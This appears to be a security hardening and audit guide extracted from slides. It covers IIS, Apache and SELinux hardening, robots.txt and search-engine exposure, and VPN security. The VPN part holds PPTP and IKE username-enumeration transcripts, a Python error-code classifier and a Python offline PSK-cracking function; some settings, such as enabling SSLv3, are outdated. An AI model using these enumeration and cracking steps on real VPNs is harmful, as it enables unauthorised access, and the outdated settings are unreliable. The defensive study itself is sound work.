This architecture ensures high security, when only the presentation tier (web server) is exposed to
the internet and communicates internally and securely with the next tier.
In order to ensure the Defense-In-Depth concept and principals are implemented, strict firewall
rules and filtering mechanisms separate the communication between each tier.
Another common concept to reduce the risk exposure is to use different platforms and
operating systems in each tier, so that a probable attacker does not get a “Hack One – Hack Them
All” opportunity. The probability of an attacker having remote code execution exploits matching the
exact versions of the different operating systems in each tier is very low.
Securing Virtual Hosts – Preventing Detection of Virtual Hosts
There are two main techniques:
1. Enforcing the webserver to respond only to the virtual host name
2. Removing PTR records that expose subdomain names
Using Hostmap
Hostmap's purpose is to enumerate all the virtual hosts and DNS names of an
IP address, and to do so in the fastest and most detailed way possible.
To achieve this, hostmap uses many techniques, some never used by any other tool, combined
with development technologies chosen for best performance.
Features
• DNS names and virtual host enumeration
• Multiple discovery techniques
• Results correlation, aggregation and normalization
• Multi thread and event based engine
• Platform independent: hostmap can run on GNU/Linux, Microsoft Windows, Apple OS X
and on any system where Ruby works.
Techniques
To enumerate all the aliases of a target machine, hostmap uses many techniques based on
protocols, exposed services, target weaknesses and vulnerabilities, brute-forcing techniques,
public databases and search engines that can reveal a target's aliases.
The data are fetched at run time from these data sources using a multi-threaded engine to speed up
the fetching phase. All fetched data are aggregated, normalized and correlated, and the results are
checked at run time to avoid false positives. The hostmap engine is event-driven: each
enumeration action can produce results, and based on the type of action and the type of results,
hostmap dynamically chooses the next action to take and the next enumeration check to launch.
Hostmap uses an adaptive engine written to get as many results as possible.
The techniques used by hostmap are the following.
Protecting against Google Hacking
1. Keep your sensitive data off the web!
Even if you think you’re only putting your data on a web site temporarily, there’s a
good chance that you’ll either forget about it, or that a web crawler might find it.
Consider more secure ways of sharing sensitive data such as SSH/SCP or
encrypted email.
2. Use meta headers at non-public pages
Valid meta robots content values:
Googlebot interprets the following robots meta tag values:
 NOINDEX - prevents the page from being included in the index.
 NOFOLLOW - prevents Googlebot from following any links on the page. (Note
that this is different from the link-level NOFOLLOW attribute, which prevents
Googlebot from following an individual link.)
 NOARCHIVE - prevents a cached copy of this page from being available in the
search results.
 NOSNIPPET - prevents a description from appearing below the page in the
search results, as well as prevents caching of the page.
 NOODP - blocks the Open Directory Project description of the page from being
used in the description that appears below the page in the search results.
 NONE - equivalent to "NOINDEX, NOFOLLOW".
<META NAME="ROBOTS" CONTENT="NONE">
3. Googledork!
• Use the techniques outlined in this paper to check your own site for
sensitive information or vulnerable files.
• Use gooscan (from http://johnny.ihackstuff.com) to scan your site for bad
stuff, but first get advance express permission from Google! Without
advance express permission, Google could come after you for violating
their terms of service. The author is currently not aware of the exact
implications of such a violation. But why anger the “Goo-Gods”?!?
• Check the official googledorks website (http://johnny.ihackstuff.com) on a
regular basis to keep up on the latest tricks and techniques.
4. Consider removing your private sites from Google’s index.
The Google webmaster FAQ located at http://www.google.com/webmasters/
provides invaluable information about ways to properly protect and/or expose
your site to Google. From that page:
“Please have the webmaster for the page in question contact us with proof that
he/she is indeed the webmaster. This proof must be in the form of a root level
page on the site in question, requesting removal from Google. Once we receive
the URL that corresponds with this root level page, we will remove the offending
page from our index.”
In some cases, you may want to remove individual pages or snippets from Google’s
index. This is also a straightforward process which can be accomplished by
following the steps outlined at http://www.google.com/remove.html.
5. Use a robots.txt file.
Web crawlers are supposed to follow the robots exclusion standard found at
http://www.robotstxt.org/wc/norobots.html. This standard outlines the procedure
for “politely requesting” that web crawlers ignore all or part of your website. I
must note that hackers may not have any such scruples, as this file is merely a
suggestion. The major search engines’ crawlers honor this file and its contents.
For examples and suggestions for using a robots.txt file, see the above URL on
robotstxt.org.
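For example, a hypothetical robots.txt that politely asks crawlers to skip private directories could look like this (the paths are placeholders):

```
# Ask all compliant crawlers to skip private areas of the site.
User-agent: *
Disallow: /admin/
Disallow: /backup/

# Additionally block Google's crawler from a reports directory.
User-agent: Googlebot
Disallow: /reports/
```

Remember that this file is itself publicly readable, so it also advertises the very paths you list; never rely on it as an access control.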
Securing IIS 7/7.5 + Microsoft SQL Server 2008
IIS Dynamic IP Restrictions Module: The mod_evasive of IIS
IIS has a module which is the exact equivalent of the well-known Apache module mod_evasive.
These modules automatically detect a user’s deviation from normal user activity
and immediately block it for a certain amount of time.
This is very useful to deny basic denial-of-service attacks and to give a hard time to someone
who is crawling/spidering your website to find hidden pages and vulnerabilities.
It can be downloaded here: http://www.iis.net/download/dynamiciprestrictions
The installation is practically “Next, Next”, thanks to the “Web Platform Installer”.
Hardening IIS SSL with IISCrypto – Disabling Weak Ciphers
The free IISCrypto tool can be downloaded at:
https://www.nartac.com/Products/IISCrypto/Default.aspx
The IIS HTTPS (SSL) server can be hardened to the FIPS 140-2 or PCI-DSS SSL security
level in a single click!
Hardening IIS 7.5 on Windows 2008 Server R2 SP1
The default IIS 7.5 installation does not include the IIS-Metabase Package, which is required for
installing URLScan (current version 3.1).
The IIS-Metabase package can be installed by:
CMD /C START /w PKGMGR.EXE /l:log.etw /iu:IIS-Metabase
It turns out that in IIS 7.5, URLScan will not run “out of the box” once installed. It must be
configured to be at the bottom of the ISAPI filter chain for it to operate properly:
Then “%windir%\system32\inetsrv\urlscan\urlscan.ini” can be configured to report the server as Apache.
Redirecting all requests from HTTP to HTTPS using IIS RewriteModule is done in the following
sequence:
Disabling Caching of Pages (will be applied for any page under that website, so make sure you
are configuring the HTTPS one)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Adding Browser Security Related HTTP Headers:
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
It looks like this:
Finally, we can test to see how it actually reacts:
telnet <server> 80
GET / HTTP/1.0
And see:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=999999999; includeSubdomains
X-Frame-Options: deny
Access-Control-Allow-Origin: http://www.xyz.com
Access-Control-Allow-Methods: POST, GET
Access-Control-Max-Age: 99999999
Server: Apache
Date: Thu, 12 May 2011 10:46:48 GMT
Connection: close
Content-Length: 155
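A response like the one above can be checked programmatically; the sketch below verifies that the hardening headers discussed in this section are present in a raw HTTP response (the required-header list reflects this section's choices, not a formal standard):

```python
# Headers this section configures; adjust the set to your own policy.
REQUIRED_HEADERS = {
    "Cache-Control",
    "Pragma",
    "X-Frame-Options",
    "X-XSS-Protection",
    "X-Content-Type-Options",
}

def missing_security_headers(raw_response: str):
    """Return which expected hardening headers a raw HTTP response lacks
    (header names compared case-insensitively)."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    present = {line.split(":", 1)[0].strip().lower()
               for line in head.split("\r\n")[1:] if ":" in line}
    return sorted(h for h in REQUIRED_HEADERS if h.lower() not in present)

# Example modeled on the telnet response shown above.
resp = ("HTTP/1.1 200 OK\r\n"
        "Cache-Control: no-store, no-cache, must-revalidate\r\n"
        "Pragma: no-cache\r\n"
        "X-Frame-Options: SAMEORIGIN\r\n"
        "X-XSS-Protection: 1; mode=block\r\n"
        "X-Content-Type-Options: nosniff\r\n"
        "\r\n")
```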
1.1. URLScan – Free by Microsoft
http://www.iis.net/download/UrlScan
1.2. WebKnight – Free Host-Based Web Application Firewall
http://www.aqtronix.com/?PageID=99#Download
1.3. Dynamic IP Restrictions (Beta) – Anti DoS, DDoS and Web Crawling
http://www.iis.net/download/DynamicIPRestrictions
1.4. Advanced Logging
http://www.iis.net/download/AdvancedLogging
Securing Apache
Apache Hardening
Apache SSL Hardening:
In path: /etc/httpd/conf.d/ssl.conf
Change:
# Make sure the SSL Engine is on, especially since we need a proxy
SSLEngine on
SSLProxyEngine on
# Make sure SSL is forcefully required
SSLOptions +StrictRequire
# Only accept SSL version 3 (don’t accept SSL v2…) and TLS (which is better)
SSLProtocol -all +SSLv3 +TLSv1
SSLProxyProtocol -all +SSLv3 +TLSv1
# Only accept high security ciphers (don’t accept low, medium and null ciphers)
SSLCipherSuite HIGH
# Make the SSL Seed Entropy stronger
SSLRandomSeed startup file:/dev/urandom 4096
# 1024 on a slow CPU server
# 2048 on a normal CPU server
# 4096 on a fast CPU server
SSLRandomSeed connect file:/dev/urandom 2048
# Define custom logs and change log file name to be unpredictable
CustomLog /var/log/httpd/mycompany_ssl_request_log "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
# Change the default name of the log files, to make their path unpredictable
ErrorLog /var/log/httpd/mycompany_ssl_error_log
TransferLog /var/log/httpd/mycompany_ssl_access_log
LogLevel warn
# Verify the remote SSL server’s certificate validity, on SSL Proxy connections
SSLProxyVerify require
# Make sure there will be no Man-In-The-Middle Attacks on SSL Renegotiations
SSLInsecureRenegotiation off
Remove:
# This slows down the server’s performance and is mostly not required
<Files ~ ".(cgi|shtml|phtml|php3?)$">
SSLOptions +StdEnvVars
</Files>
<Directory "/var/www/cgi-bin">
SSLOptions +StdEnvVars
</Directory>
Mod_Evasive – Anti-D.O.S Apache Module
# we need “apxs” to compile mod_evasive, It should be in one of the following
/usr/local/psa/admin/bin/apxs
/usr/sbin/apxs
# If it wasn’t found we can find it manually
locate apxs | grep bin
# Download mod_evasive
wget http://www.zdziarski.com/projects/mod_evasive/mod_evasive_1.10.1.tar.gz
# Extract mod_evasive source files
tar xvzf mod_evasive_1.10.1.tar.gz mod_evasive/
# Compile mod_evasive
/usr/sbin/apxs -cia /usr/src/mod_evasive/mod_evasive20.c
# Check mod_evasive is configured to be loaded in the apache configuration file
grep -i evasive /etc/httpd/conf/httpd.conf
#Add the following optimized rules at the end of /etc/httpd/conf/httpd.conf:
<IfModule mod_evasive20.c>
DOSHashTableSize 3097
DOSPageCount 100
DOSSiteCount 500
DOSPageInterval 1
DOSSiteInterval 1
DOSBlockingPeriod 600
</IfModule>
# Restart apache so mod_evasive will be loaded into it on process initiation
/etc/init.d/httpd restart
# If application interference occurs, disable mod_evasive by commenting out
# the following line: “Include conf/mod_evasive20.conf”
SELinux – Optional Hardening:
SELinux Apache Hardening
# Change context of “/var/www/html” to “httpd_sys_content_t”
chcon -R -t httpd_sys_content_t /var/www/html
# Ensure all newly created files get the same matching context type
semanage fcontext -a -t httpd_sys_content_t /var/www/html
# Change context of “/var/log/httpd” to “httpd_log_t”
chcon -R -t httpd_log_t /var/log/httpd
# Ensure all newly created files get the same matching context type
semanage fcontext -a -t httpd_log_t /var/log/httpd
# Enforcing SELinux Rules
echo 1 >/selinux/enforce
# Restarting Tomcat after SELinux:
cd /home/dominodf/home/dominodf/DigitalFuel-Tomcat/DigitalFuel-7.0/Domino_Live/ &&
/home/dominodf/home/dominodf/DigitalFuel-Tomcat/DigitalFuel-
7.0/Domino_Live/shutdown.sh && /home/dominodf/home/dominodf/DigitalFuel-
Tomcat/DigitalFuel-7.0/Domino_Live/startup.sh
SELinux for other services (Experts Only)
Enable Hardened HTTP
setsebool -P httpd_builtin_scripting 1
setsebool -P httpd_can_network_connect_db 1
setsebool -P httpd_can_network_connect 1
setsebool -P httpd_can_sendmail 1
setsebool -P httpd_can_network_relay 1
setsebool -P httpd_enable_cgi 1
setsebool -P httpd_enable_homedirs 1
setsebool -P allow_httpd_sys_script_anon_write 1
setsebool -P allow_httpd_anon_write 1
setsebool -P httpd_suexec_disable_trans 1
setsebool -P httpd_tty_comm 0
setsebool -P httpd_unified 0
setsebool -P httpd_enable_ftp_server 0
setsebool -P allow_httpd_bugzilla_script_anon_write 0
setsebool -P allow_httpd_mod_auth_pam 0
setsebool -P allow_httpd_nagios_script_anon_write 0
setsebool -P allow_httpd_prewikka_script_anon_write 0
setsebool -P allow_httpd_squid_script_anon_write 0
setsebool -P httpd_disable_trans 1
setsebool -P httpd_rotatelogs_disable_trans 1
setsebool -P httpd_ssi_exec 0
setsebool -P httpd_use_cifs 0
setsebool -P httpd_use_nfs 0
Limiting Flash, Java & JavaScript
http://flash.melameth.com/togflash.msi
Email protection & filtering
 Disable inbound spoofing
Sending Spoofed Emails – Bypassing SPF with an $8 Domain
 Attachment filtering by content type and extension detection & matching
 Using multiple anti-virus engines
 Consider Domain Whitelisting by manual moderation
VPN Security
Identifying VPNs & Firewalls (Fingerprinting VPNS)
In the last decade, Virtual Private Networks (VPNs) became the most commonly deployed
solution for users working remotely. Providing the user a full, remote, network-level connection to
the company’s LAN is extremely dangerous, since the LAN is known to be the organization’s
“weak stomach”. However, most organizations require some people to work from home, and their
field technicians and salesmen to connect to the company’s internal resources.
The alternative solution to VPN is port forwarding. This solution means opening direct access
from the internet to an internal system, making it accessible and attackable by anyone. Certain
internal systems, which are sometimes old or self-developed, lack the security level required for
internet exposure; opening access to such a system is too dangerous. Port forwarding also lacks
the flexibility of multiple people connecting to the same port and getting redirected to different
machines, for services such as Remote Desktop, where each user should be forwarded to his own
local computer.
VPN solves these security risks where nothing is exposed to the internet except for the company’s
VPN server, which is usually integrated into the Firewall. The only risk left is hacking into the
company’s LAN by attacking the VPN server itself or guessing the credentials of an authorized
remote access VPN user.
Like any other server product, each manufacturer’s VPN server replies differently to the same
request, which means it can be distinguished from other products and finally identified. The most
advanced VPN fingerprinting tool is IKE-Scan, created by http://nta-monitor.com.
IKE-Scan allows attackers to remotely identify the VPN product used by the target company,
analyzing the server’s responses to IKE (Internet Key Exchange) Protocol requests.
Offline password cracking
Once a valid username is obtained using IKE Aggressive Mode, it is possible to obtain a hash
from the VPN server and use it to mount an offline attack to crack the associated password. As
this attack is offline, it does not show on the VPN server log or cause account lockout. It is also
extremely fast - typically several hundred thousand guesses per second:
 A six character password using letters from A-Z, which has a possible 309 million
combinations, can be cracked by brute force in 16 minutes
 A six character password using letters and numbers, with a possible 57 billion
combinations, can be cracked in two days.
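These figures can be verified with a quick calculation, assuming a rate of 300,000 guesses per second ("several hundred thousand") and case-sensitive letters plus digits for the second case:

```python
# Verifying the brute-force figures quoted above. The guess rate is an
# assumption chosen from the "several hundred thousand per second" range.
RATE = 300_000  # guesses per second (assumed)

letters_only = 26 ** 6    # six letters A-Z: ~309 million combinations
letters_digits = 62 ** 6  # six case-sensitive letters/digits: ~57 billion

minutes = letters_only / RATE / 60      # worst case, letters only
days = letters_digits / RATE / 86400    # worst case, letters and digits
```

At this assumed rate the letters-only keyspace falls in roughly a quarter of an hour, and the letters-plus-digits keyspace in a couple of days, consistent with the figures quoted above.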
VPNs are an attractive target to hackers as they carry sensitive information over an insecure
network and remote access VPNs often allow full access to the internal network, while VPN
traffic is usually invisible to IDS monitoring. With increasing security in other areas e.g. more
organizations installing firewalls, moving Internet servers onto the DMZ and automatically
patching servers, the VPN becomes a more tempting target.
Scanning for hosts listening on TCP port 990 finds a brute-forceable Check Point
Firewall VPN:
On some implementations it is configured to listen on port 80:
Identifying Check Point VPN-1 Edge Portal
VPN IKE User Enumeration
Many remote access VPNs have vulnerabilities that allow valid usernames to be guessed
through a dictionary attack, because they respond differently to valid and invalid
usernames. One of the basic requirements of a username/password authentication scheme
is that an incorrect login attempt should not leak information as to whether the username
or password was incorrect, because the attacker can then deduce if the username is valid
or not. However, many VPN implementations ignore this rule.
The fact that VPN usernames are often based on people's names or email addresses
makes it relatively easy for an attacker to use a dictionary attack to recover a number of
valid usernames in a short period of time.
VPN PPTP User Enumeration
Some devices allow remote user access through the use of the PPTP VPN service. When enabled, this can
normally be detected remotely through the presence of an open TCP port (1723) and the device’s
acceptance of the GRE protocol (IP protocol number 47).
The PPTP VPN service uses MS-CHAPv2 for authentication. This relies on a challenge/response
mechanism in order to successfully authenticate users. When a remote user attempts to
authenticate with the PPTP VPN service, an MS-CHAPv2 packet should be returned indicating
success or failure. Failure is indicated by the return of a code 4 MS-CHAPv2 packet. This packet
will additionally contain a value in the form E=<error_number> which indicates the type of error
that occurred. A list of common error codes is given below:
646 ERROR_RESTRICTED_LOGON_HOURS
647 ERROR_ACCT_DISABLED
648 ERROR_PASSWD_EXPIRED
649 ERROR_NO_DIALIN_PERMISSION
691 ERROR_AUTHENTICATION_FAILURE
709 ERROR_CHANGING_PASSWORD
The vulnerability arises because the error code returned in the failure packet depends on
whether or not the supplied username is valid. When a valid username is given with an
incorrect password, the following response is returned:
sent [LCP ConfReq id=0x1 <asyncmap 0x0> <magic 0x444fc9b9> <accomp>]
rcvd [LCP ConfReq id=0x1 <mru 338> <auth chap MS-v2> <magic 0xfa52b227> <pcomp>
<accomp>]
sent [LCP ConfRej id=0x1 <pcomp>]
rcvd [LCP ConfRej id=0x1 <asyncmap 0x0>]
sent [LCP ConfReq id=0x2 <magic 0x444fc9b9> <accomp>]
rcvd [LCP ConfReq id=0x2 <mru 338> <auth chap MS-v2> <magic 0xfa52b227> <accomp>]
sent [LCP ConfAck id=0x2 <mru 338> <auth chap MS-v2> <magic 0xfa52b227> <accomp>]
rcvd [LCP ConfAck id=0x2 <magic 0x444fc9b9> <accomp>]
sent [LCP EchoReq id=0x0 magic=0x444fc9b9]
rcvd [CHAP Challenge id=0x1 <d15340ea7112ac46f240e4f18fe2a278>, name = "watchguard"]
sent [CHAP Response id=0x1
<73469ca9bed04ea6f0e5d1be49b47a1a0000000000000000f424ac68e12
31f756e1657a2bc25efcd3b7ba78110bcf48201>, name = "valid_username"]
rcvd [LCP EchoRep id=0x0 magic=0xfa52b227]
rcvd [CHAP Failure id=0x1 "E=691 R=1 Try again"]
MS-CHAP authentication failed: E=691 Authentication failure
CHAP authentication failed
However, when an invalid username is supplied, the following response is received:
sent [LCP ConfReq id=0x1 <asyncmap 0x0> <magic 0x9689f323> <accomp>]
rcvd [LCP ConfReq id=0x1 <mru 338> <auth chap MS-v2> <magic 0x245cdcee> <pcomp>
<accomp>]
sent [LCP ConfRej id=0x1 <pcomp>]
rcvd [LCP ConfRej id=0x1 <asyncmap 0x0>]
sent [LCP ConfReq id=0x2 <magic 0x9689f323> <accomp>]
rcvd [LCP ConfReq id=0x2 <mru 338> <auth chap MS-v2> <magic 0x245cdcee> <accomp>]
sent [LCP ConfAck id=0x2 <mru 338> <auth chap MS-v2> <magic 0x245cdcee> <accomp>]
rcvd [LCP ConfAck id=0x2 <magic 0x9689f323> <accomp>]
sent [LCP EchoReq id=0x0 magic=0x9689f323]
rcvd [CHAP Challenge id=0x1 <d15340ea7112ac46f240e4f18fe2a278>, name = "watchguard"]
sent [CHAP Response id=0x1
<73469ca9bed04ea6f0e5d1be49b47a1a0000000000000000f424ac68e12
31f756e1657a2bc25efcd3b7ba78110bcf48201>, name = "invalid_username"]
rcvd [LCP EchoRep id=0x0 magic=0x245cdcee]
rcvd [CHAP Failure id=0x1 "E=649 R=1 Try again"]
MS-CHAP authentication failed: E=649
CHAP authentication failed
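Based on the two transcripts and the error-code table above, a small classifier can turn a captured CHAP Failure line into a valid/invalid username verdict. This is an illustrative sketch; the "E=691 means the username was valid" heuristic is taken from the example responses above, where a real account with a wrong password returned E=691 and a nonexistent account returned E=649:

```python
import re

# Error codes from the table above.
MSCHAPV2_ERRORS = {
    646: "ERROR_RESTRICTED_LOGON_HOURS",
    647: "ERROR_ACCT_DISABLED",
    648: "ERROR_PASSWD_EXPIRED",
    649: "ERROR_NO_DIALIN_PERMISSION",
    691: "ERROR_AUTHENTICATION_FAILURE",
    709: "ERROR_CHANGING_PASSWORD",
}

def classify_failure(chap_failure_text: str):
    """Extract the E=<n> code from a CHAP Failure message and report
    whether it suggests the probed username exists."""
    m = re.search(r"E=(\d+)", chap_failure_text)
    if not m:
        raise ValueError("no E=<code> field found")
    code = int(m.group(1))
    name = MSCHAPV2_ERRORS.get(code, "UNKNOWN")
    # Per the transcripts above: wrong password for a real account -> E=691;
    # a nonexistent account returned a different code (E=649 in the example).
    username_probably_valid = (code == 691)
    return code, name, username_probably_valid
```

Running this over the failure lines of an automated dictionary of connection attempts yields the list of probably-valid usernames.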
VPN Clients Man-In-The-Middle Downgrade Attacks
Downgrade Attacks - IPSEC Failure
MITM attackers may block the key material exchanged on UDP port 500 to deceive the victim
into thinking that an IPsec connection cannot be established with the other side. If the victim
host is configured to fall back to an unprotected connection, the traffic then flows in clear
text over the link without being noticed.
Downgrade Attacks – PPTP
During the protocol negotiation phase at the beginning of a PPTP session, MITM attackers may
force the victim to use the less secure PAP authentication, MS-CHAPv1 (i.e., a downgrade from
MS-CHAPv2), or even no encryption at all.
Attackers can also force renegotiation (the Terminate-Ack packet is sent in clear text), steal
passwords from existing tunnels, and replay previous attacks.
Attackers can compel a "password change" to obtain password hashes that can be used directly by
a modified SMB or PPTP client. MS-CHAPv1 hashes can also be recovered this way.
PPTP:
PPTP (Point-to-Point Tunneling Protocol) is a protocol for VPN implementation. Microsoft
MS-CHAPv2 or EAP-TLS is used to authenticate PPTP connections. EAP-TLS (Extensible
Authentication Protocol - Transport Layer Security) is certificate-based, and is therefore a more
secure option for PPTP than MS-CHAPv2.
PPTP Brute Force
Hacking VPNs with “Aggressive Mode Enabled”
Secure VPN
Insecure VPN
Got PSK Key (SHA1 Password Hash)
Cracked PSK Key (Full Brute-Force Attack – 1 hour on an Intel i7)
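The offline cracking step works roughly as follows: with the aggressive-mode exchange recorded, each candidate PSK is fed through the RFC 2409 key derivation and compared against the captured HASH_R. This is a simplified sketch of the approach used by tools such as ike-scan's psk-crack (assuming an HMAC-SHA1 PRF); the field names in `captured` are illustrative:

```python
import hashlib
import hmac

def crack_ike_psk(captured: dict, wordlist):
    """Offline dictionary attack on an IKE aggressive-mode handshake.

    Per RFC 2409, for pre-shared-key authentication:
      SKEYID = prf(PSK, Ni_b | Nr_b)
      HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    Every value on the right-hand side except the PSK is visible on the
    wire in aggressive mode, so HASH_R can be recomputed per candidate.
    """
    msg = (captured["g_xr"] + captured["g_xi"] + captured["cky_r"]
           + captured["cky_i"] + captured["sai"] + captured["idir"])
    nonces = captured["ni"] + captured["nr"]
    for candidate in wordlist:
        skeyid = hmac.new(candidate.encode(), nonces, hashlib.sha1).digest()
        hash_r = hmac.new(skeyid, msg, hashlib.sha1).digest()
        if hash_r == captured["hash_r"]:
            return candidate  # PSK recovered
    return None
```

Because the attack is entirely offline, only the strength of the pre-shared key limits it, which is why the weak PSK above fell to brute force in about an hour.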
Downloading Check Point SecureClient
Attacking hosts in the internal network – remotely
Endpoint Security
 Device Control
 Application Control
 Data Loss Prevention
Penetration tests and red team exercises
 Examples
 Case Studies
Implementing Identity & Access Management
Creating Backups, BCP & DRP
 Onsite storage
 Offsite storage
 Secured access to backups
 Scheduling backups
Security Metrics
 Measuring the effectiveness of investments
 Formal IT control review
 Cost-benefit perspective
 Implementation issues
 Commitment to continued improvement
Incident Response
 Identifying the probable risks
 Defining the incident assurance factors
 Defining the contacts and personnel per incident type
 Developing your security threat response plan
Creating an audit
 Defining the scope of your audit: creating asset lists and a security perimeter
 What is the security perimeter?
 Assets to consider; creating a 'threats list': what threats to include
 Common 'threats' to get you started
 Past due diligence & predicting the future
 Examining your threat history
 Checking security trends
 Checking with your competition
 Prioritizing your assets & vulnerabilities
 Performing a risk calculation / probability calculation
 Calculating probability
 Calculating harm
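The probability and harm calculations above combine into a per-asset risk score (risk = probability × harm). The sketch below is a hypothetical scoring model; the scales, example assets and values are invented for illustration, not from the source:

```python
from dataclasses import dataclass

@dataclass
class AssetRisk:
    name: str
    probability: float  # 0.0 (never) .. 1.0 (certain) over the audit period
    harm: int           # 1 (negligible) .. 10 (business-ending)

    @property
    def risk(self) -> float:
        # Classic expected-loss style score: likelihood times impact.
        return self.probability * self.harm

# Example asset list (values are illustrative).
assets = [
    AssetRisk("public web server", probability=0.6, harm=7),
    AssetRisk("internal file share", probability=0.2, harm=9),
    AssetRisk("test lab switch", probability=0.3, harm=2),
]

# Prioritize assets for the audit by risk score, highest first.
for a in sorted(assets, key=lambda a: a.risk, reverse=True):
    print(f"{a.name}: risk={a.risk:.1f}")
```

Sorting by this score gives the prioritized asset list the audit steps call for; the model can be refined with per-threat probabilities once the threat list exists.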
Conclusions
 Periodic and continual testing of controls
o As the security world is a very dynamic environment and new attack methods
and techniques are invented every day, security controls must be updated
constantly
o Engines/products require a physical-level upgrade every few years
o Controls must be tested at least quarterly
 Future evolution of the 20 critical controls
o In the future most controls will integrate into the SIEM
o The SIEM will be the main operation center and will activate most of the
controls according to the defined rules
o All controls are going to focus on the application layer, mostly on Web
systems
o Desktop clients will almost disappear
o Attacks will become more high-level and logical; security will focus more and
more on understanding systems and less on technical bugs and vulnerabilities
o At some point, in order to mitigate complex logical vulnerabilities, controls will
integrate “Artificial Intelligence”
o The mobile world will integrate into the classical PC and network environment
and will ultimately replace most PCs and/or laptops
 Summary and action plan
o Information Security is a repetitive process
o Information Security Controls are the tools; they need the right setup, the right
rules and periodic maintenance
o It is not right to buy 10 different solutions and store them in a box inside a closet
o Every solution has to be implemented and integrated slowly, one by one
o Compliance is the best tool an information security manager has to get
management support for mitigating security issues
o Real-time monitoring of critical systems, with the right rules and with personnel
reacting to the events, is more valuable than most security controls
Implementing and auditing security controls part 2

  • 1. 173 | P a g e Main Functionalities:  Real-time, subnet-level tracking of unmanaged, networked devices  Detailed hardware information including slot description, memory configuration and network adaptor configuration  Extended plug-and-play monitor data including secondary monitor information  Detailed asset-tag and serial number information, as well as embedded pointed device, fixed drive and CD-ROM data  Multi-layer information model – the idea is to represent the same equipment and connections in several layers, with technology-specific information included in the dedicated layer providing a consistent view of the network for the operator without an information overflow.  The layers represent both physical and logical information of managed network, including: physical network resources, infrastructure, physical connections, digital transmission layer (SDH/SONET (STM-n, VC-4, VC-12, OC-n), PDH (E1, T1)),
  • 2. 174 | P a g e telephony layer, IP-related layers, GSM/CDMA/UMTS-related layers as well as ATM and FR layers  History tracking - inventory objects (equipment, connections, numbering resources etc.) are stored with full history of changes which enables change tracking; a new history entry is made in three cases: object creation (the first history entry is made); object modification (for each modification a new entry is added); and object removal (the last history entry is made)  Auto-discovery and reconciliation – enables to keep the stored information up-to-date with the changes occurring in the network. The auto-discovery tool enables adding new network elements to the inventory database, removing existing network elements from the inventory database as well as updating the inventory database due to changed cards, ports or interfaces  Network planning – future object planning support (storing future changes in the equipment, switches configuration, connections, etc.); plans are executed or applied by the system logic – object creation / changing actually take place and planned objects become active in the inventory system; enables visualization of the network state in the future  Inventory-Based Billing enables accurate calculations of customer charges for inventory products and services (e.g. 
equipment, locations, connections, capacity); this module is able to calculate charges for services leased from another operator (vendor) and resold (with profit) to customers, and to generate invoices  Inventory and Console Tools allow user-friendly management of important objects used in the application (creating templates (Logical View, Report Management, Charts), editing symbols and links, searching for objects, encrypting passwords and notifying users of various actions/events)  Wizards and templates provide flexibility but do not allow for inconsistent manipulation of data; new objects are created with an object creation wizard (so called template), which enables defining all attributes and necessary referential object (path details for connections, detailed elements (cards, ports) for equipment etc.); the user can define which attributes of an object should be mandatory / predefined and if they should have a constant value  Process-driven Inventory – by introduction of automated processes, all user tasks related to inventory data are done in the context of a process instance; changing the state of the network (e.g. by provisioning a new service) cannot be done without updating information in the inventory; this assures real-time accuracy of the inventory database  Information theft – A network inventory management system not only keeps track of your hardware but also your software. It also shows you who has access to that software. A regular check of your system's inventory will let you know who has downloaded and used software they may not be authorized to use.  Equipment theft – A network management system will automatically detect every piece of equipment and software connected to your system. And it will also let you know which items are not working properly, which items need to be replaced, and which items have
  • 3. 175 | P a g e mysteriously disappeared. Eliminate workplace theft simply by running a regularly scheduled inventory check.  Licensing agreements – An inventory of your software and licensing agreements will let you know if you've got the necessary licensing agreements for all your software. Insufficient licensing can cost you usage fees and fines and duplicating software that you already have is an unnecessary expense.  System Upgrades – Outdated equipment and software can cost your company time, money, and resources. Downtime and slow response times are two of the biggest time killers for your business. Set filters on your network inventory management system to alert you when it's time to upgrade software or replace hardware with newer technology to keep your system running as smoothly and efficiently as possible. Benefits:  End-to-end view of multi-vendor, multi-technology networks  Reduced network operating cost  Improved utilization of existing resources  Quicker, more efficient change management  Visualization and control of distributed resources  Seamless integration within the existing environment  Automatically discovers and diagrams network topology  Automatic generation of network maps in Microsoft Office Visio  Automatically detects new devices and changes to network topology  Simplifies inventory management for hardware and software assets  Addresses reporting needs for PCI compliance and other regulatory requirements powerful capabilities, including: o Inventory management for all systems o Direct access to Windows, Macintosh and Linux devices o Automatically save hardware and software configuration information in a SQL database o Generate systems continuity and backup profiler reports o Use remote management capabilities to shut down, restart and launch applications
  • 4. 176 | P a g e Completing the gaps with scripts
  • 5. 177 | P a g e Creating Device Groups (Security Level, Same Version…) Creating Policies Microsoft released Security Compliance Manager along with a heap of new security baseline for you to use to compare against your environment. In case you are not familiar with SCM then it is a great product from Microsoft that consolidates all the best practice for their software with in-depth explanation for each setting. Notably this new version has security baselines for Exchange Server 2010 and 2007. These baselines are also customized for the specific role of the server. Also interesting is the baseline settings not only include group policy computer settings but also PowerShell command to configured aspects of the product that are not as simply to make as a registry key change.
  • 6. 178 | P a g e
  • 7. 179 | P a g e As you can see from the image below the PowerShell script to perform the required configuration is listed in the detail pain… Attachments and Guidelines Another new feature you might notice is that there is now a section called Attachments and Guidelines that has a lot of support documentation that relate to the Security baseline. This section also allows you to add your own supporting documentation to your custom baseline templates.
  • 8. 180 | P a g e How to Import an existing GPO into Microsoft Security Compliance Manager v2 To start you simply need to make a backup of the existing Group Policy Object via the Group Policy Management Console and then import it by selecting the “Import GPO” option in the new tool at the top right corner (see image below).
  • 9. 181 | P a g e Select the path to the backup of individual GPO (see image below).
  • 10. 182 | P a g e Once you click OK the policy will then import into the SCM tool. Once the GPO is imported the tool will look at the registry path and if it is a known value it will then match it up with the additional information already contained in the SCM database (very smart).
